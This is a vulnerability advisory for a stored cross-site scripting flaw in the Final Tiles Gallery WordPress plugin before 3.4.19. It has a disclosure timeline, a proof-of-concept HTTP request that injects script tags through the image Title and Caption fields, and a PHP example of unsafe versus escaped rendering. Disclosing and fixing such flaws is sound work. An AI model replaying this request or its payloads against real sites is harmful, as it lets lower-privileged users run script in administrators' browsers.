Source: wpvulndb
Author: Ngo Van Thien
WPVDB-ID: D597A4A6-FDD1-4629-9F4F-6B7A9114C65A
History: May 28, 2020 - 12:00 a.m.

Final Tiles Gallery < 3.4.19 - Authenticated Stored Cross-Site Scripting (XSS)

Published on wpscan.com

EPSS: 0.001 (Low), percentile 31.2%

Multiple cross-site scripting vulnerabilities in Final Tiles Gallery 3.4.18 and lower allow remote attackers to inject arbitrary web script or HTML via the Title and Caption fields of an image. Successful exploitation would allow an authenticated high-privileged user (author+) to inject arbitrary JavaScript into a post that uses the gallery; the script then runs in the browser of any admin or other user who views that post.

Timeline (WPScan Team):
May 14th, 2020 - Issue confirmed, vendor contacted (via https://www.machothemes.com/contact-us-now/) and given 14 days for a response before escalating to the WP plugins team.
May 27th, 2020 - v3.4.19 released, fixing the issue.

PoC

XSS trigger point: when an admin or other authenticated user loads the contents of the gallery, or a post embedding it via the shortcode [FinalTilesGallery id='3'], for example:

https://[WP]/wp-admin/admin.php?page=ftg-lite-gallery-admin&id=2
https://[WP]/2020/05/13/site-review/

Add an image to a gallery from the plugin, then put the payload in the Title and Caption fields. The resulting save request:

POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://example.com/wp-admin/admin.php?page=ftg-lite-gallery-admin&id=2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 368
Origin: http://example.com
Connection: close
Cookie: wordpress_58dc4566418ddfdf24cf6b5640426bf6=admin%7C1590369568%7CvSHzpmLsv6Kmrqs3GIvTptVPrAKjmhvqSX3Y8xwwaoj%7C3ff5dbb79e29018c7866d9c1a371b372f43c22ff140dfd7b1c0fa68bda3d96ad; table_1=off; table_O-Z=on; table_2=off; table_I-Z=on; table_3=off; table_II-Z=on; table_4=off; table_III-Z=on; table_5=off; table_IV-Z=on; table_6=off; table_V-Z=on; table_7=off; table_VI-Z=on; table_8=off; table_VII-Z=on; table_9=off; table_VIII-Z=on; table_10=off; table_IX-Z=on; table_11=off; table_X-Z=on; table_12=off; table_XI-Z=on; wplcfirstsession=1; wfu_storage_QD1qfXa1PwpRDp11=C:Users; nc_sid=-xLya3FYncyYR9V_llTt; ftg_imglist_size=medium; wp-settings-1=libraryContent%3Dbrowse%26urlbutton%3Dnone%26posts_list_mode%3Dexcerpt%26uploader%3D1%26mfold%3Do; wp-settings-time-1=1589361159; wordpress_logged_in_58dc4566418ddfdf24cf6b5640426bf6=admin%7C1590369568%7CvSHzpmLsv6Kmrqs3GIvTptVPrAKjmhvqSX3Y8xwwaoj%7Cf1c7845d2c3b0856cfa559d0f5496afd2f03e7f519a0f26a3ede63fd8971759c; nc_sid=ta7RSzGrI-rVg-9hyzIk; advanced_ads_hide_deactivate_feedback=1; wplc_chat_status=5; _icl_current_language=en; nc_status=browsing; tcx_customerID=rJQlLlHFcU; wplc_cid=Bk4eLeHFcI_1589362760300; PHPSESSID=909kc73hdpc69l5vk6malipke7

source=images&action=save_image&FinalTiles_gallery=3ddb0e3aa2&img_url=http%3A%2F%2Ftarget%2Fwordpress%2Fwp-content%2Fuploads%2F2020%2F05%2Ftiki-5.jpg&imageTitle=%3Cscript%3Ealert(1111)%3C%2Fscript%3E&description=%3Cscript%3Ealert(2222)%3C%2Fscript%3E&alt=alttext&link=&target=&id=2&type=image&img_id=7&sortOrder=2&filters=&post_id=0
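The defensive counterpart to the advisory: an added, hypothetical illustration (not the Final Tiles Gallery plugin's own code) of the unescaped output pattern behind this class of bug and its escaped form, using the imageTitle and description parameters from the request above. It assumes it runs with WordPress loaded (for example inside a plugin's PHPUnit test) so that esc_url(), esc_attr() and wp_kses_post() exist.

```php
<?php
// Hypothetical illustration, not the Final Tiles Gallery code: how a stored
// image title and caption could be rendered unsafely by a gallery shortcode,
// and the escaped form that neutralises the stored XSS on output.

// Sample values, constructed to mirror the imageTitle/description parameters
// of the save_image request in the PoC (as PHP sees them after URL-decoding).
$image = [
    'imageTitle'  => '<script>alert(1111)</script>',
    'description' => '<script>alert(2222)</script>',
    'img_url'     => 'http://example.com/wp-content/uploads/2020/05/tiki-5.jpg',
];

// Vulnerable pattern: stored values are concatenated straight into markup, so
// the script elements are emitted verbatim when the gallery renders and run
// in the browser of whoever views the post (an admin included).
function render_tile_unsafe(array $img): string {
    return '<figure class="tile">'
        . '<img src="' . $img['img_url'] . '" title="' . $img['imageTitle'] . '">'
        . '<figcaption>' . $img['description'] . '</figcaption>'
        . '</figure>';
}

// Hardened pattern: escape at the point of output with the WordPress helpers
// that match each context. esc_url() for the src, esc_attr() inside the title
// attribute, and wp_kses_post() for the caption so harmless formatting
// survives while <script> and event handlers are stripped.
function render_tile_safe(array $img): string {
    return '<figure class="tile">'
        . '<img src="' . esc_url($img['img_url']) . '" title="' . esc_attr($img['imageTitle']) . '">'
        . '<figcaption>' . wp_kses_post($img['description']) . '</figcaption>'
        . '</figure>';
}

// Regression check a plugin's test suite can keep: rendered gallery markup
// must never contain a literal script element.
function contains_script(string $html): bool {
    return stripos($html, '<script') !== false;
}

// The unsafe render still carries both payloads; the escaped render does not.
assert(contains_script(render_tile_unsafe($image)) === true);
assert(contains_script(render_tile_safe($image)) === false);
```

Escaping on output is the durable fix because authors and editors lack the unfiltered_html capability WordPress reserves for administrators, so any field they can fill must be treated as untrusted when it is rendered.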

Affected software (CPE)
Name: final-tiles-grid-gallery-lite
Operator: lt (less than)
Version: 3.4.19

